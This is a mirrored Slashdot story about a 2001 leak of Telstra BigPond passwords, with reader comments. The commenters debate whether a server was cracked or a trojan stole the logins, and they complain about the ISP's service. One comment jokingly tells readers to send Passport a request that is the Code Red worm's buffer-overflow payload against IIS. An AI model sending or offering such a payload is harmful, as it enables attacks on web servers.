Slashdot Mirror

← Back to Stories (view on slashdot.org)

Telstra BigPond Passwords Leaked

Posted by ryuzaki0 on from the change-yer-passwords dept.

Lord Cyric writes: "Telstra, DownUnder's biggest and baddest telco, has had a major security breach yesterday when a sample of its BigPond Internet password list was posted on various newsboards. The Australian Broadband Users Group (ABUG) has confirmed that this is not a hoax. This hack exposes the passwords for most of Telstra's Internet services (dialup, cable & ADSL). With all the bad press Telstra has been receiving lately over it's shoddy ADSL rollout and download caps, they certainly didn't need this ..." This site is not exactly the Telstra P.R. department.

9 of 97 comments (clear)

  1. Calm down people by hayden · · Score: 4

    Before I start I'll just say I am a Bigpond Cable subscriber.

    With out more info there is no way of knowing if this is a crack or PEBCAK. It's entirely possible that this was done with social engineering or trojan(s), not a 1337 4ax0r. So far all that's known that 70 accounts were comprimised by some method.

    To put it in perspective, recently somebody sent an email to a large number Bigpond users pretending to be from Telstra asking them for their password and credit card number just so they could check their records. A depressing number of people replyed. We're not talking about the most security literate people in the world here.

    Telstra uses pretty much standard PPPoE for ADSL although they do use the ADSL modems that had the security problem a while back.

    We've also heard that Telstra has already caught the person responsible.

    BTW the "Australian Broadband Users Group" are widely regarded among Australian broadband users to be a bunch of self-important tools who are pretty much out to make themselves look big. The only guy who's worth listening to is they guy that runs www.whirlpool.net.au The rest are just dead weight.

    --
    Nerd: Derogatory term typically directed at anybody with a lower Slashdot ID than you.
  2. Thanks Telstra! by wct · · Score: 4

    As a BigPond ADSL user I have much to be thankful for. Thanks for the two-weeks downtime last month, changing the user agreement on download restrictions after the contract was signed, and forcing me to call every 4 days to reset my account when an authentication error on your end hangs the connection.

    But most of all, thanks for leaking the account passwords through poor security and having the foresight to keep the server down right now so I can't change mine.

  3. Re:Telstra in denial by szcx · · Score: 4
    To be more accurate, they're blaming user stupidity. They're saying that a password-ripping trojan is responsible (which is entirely possible).

    From NineMSN;

    Telstra retail corporate affairs manager Stuart Gray said the virus, which operated on broadband users, collected the user names and passwords, automatically sending them back to the person who had activated the virus.

    "BigPond has not been hacked. What has happened is a Trojan virus has been lodged on a number of BigPond users," he told AAP tonight.

    Mr Gray said the hacker responsible had placed the user names and passwords of 69 BigPond customers on websites.

    BigPond had contacted the customers, changing their passwords and closing down their sites so other people couldn't use their names.

    The virus had been found on the websites of the customers contacted.

    "It's a real warning for broadband customers how important it is for them to have the latest anti-virus software and firewall software and protect themselves as much as possible," he said.

    Telstra is evil, but this looks more like the work of idiot users.

    Keep the pitchfork and flaming torches handy though, they'll fuck up sooner or later.

  4. Who wants the pass anyway.... by Bryan_Crowl · · Score: 4

    with only 3 gigs a month (upstream and down) the adsl and cable *unlimited* accounts are just about useless. Maybe this will force someone in the Government (who still own 51% of telstra) to do something.

    --
    Someday, we'll look back on this, laugh nervously and change the subject.
  5. Not a hoax? by wolvie_ · · Score: 5
    The Australian Broadband Users Group (ABUG) has confirmed that this is not a hoax.

    What? The site which originally broke the story (CORE) have now posted another article saying Telstra's servers were probably not cracked. Specifically:

    Sub7 or some other "netbus" program has been used to leech the accounts of the users machines. This is at the moment the scenario I favour...

    Sure, Telstra fucked up their ADSL network and extremely pissed off many users with their download caps, but there isn't proof yet that they screwed up on this too.

  6. liable? by rneches · · Score: 5
    Does the law in Australia allow companies to be held liable for breaches in security? It seems to me that it would be bad faith at the very least. On the other hand, I can't think of an example where a company
    • had crappy security
    • got hacked, hurting their users and customers in a tangable way
    • were sued by thier customers
    • lost/settled with their customers
    As far as I can tell, the hackers are the ones considered culpable, not the incompitant admins who let them in. Is there a legal basis for this, or is it just the way things work? Or am I being paranoid?

    --

    --
    In spite of the suggestions and all the tests that I have made, I have not cavato a spider from the hole.
  7. Telstra in denial by James+Foster · · Score: 4

    As you can read here Telstra are in fact denying any crack taking place. They're blaming it on the users!

  8. telstra's problem has been solved by circletimessquare · · Score: 4

    luckily telstra has embraced the obvious future of authentication on the internet and decided on a unilateral capitulation to microsoft's passport service. resistance is futile! duh!

    all of their subscribers have been sent an email saying to get a new user name and password by just sending the following simple http request to www.passport.com ;-)

    GET /default.ida? NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801% u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801% u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff% u0078%u0000%u00=a HTTP/1.0

    --
    intellectual property law is philosophically incoherent. it is your moral duty to ignore it or sabotage it
  9. Not a Hoax by justinf · · Score: 4

    There is a good article, and a good discussion thread available at http://www.whirlpool.net.au. It outlines the fact that the passwords would never be stored in plaintext (the passwords are stored on industry-standard enterprise servers), and that many of the released passwords were extremely strong (suggesting the passwords were not cracked).

    It seems only natural to assume someone has spent some time collecting logins and passwords via another method, and is posting their results with the view of creating FUD over Telstra's service. Just because 69 passwords have been obtained, doesn't mean there exists a vunerability for the tens or hundreds of thousands of subscribers of the service.

    I don't particularly like Telstra, nor do I use their internet, but I dont believe they are this stupid.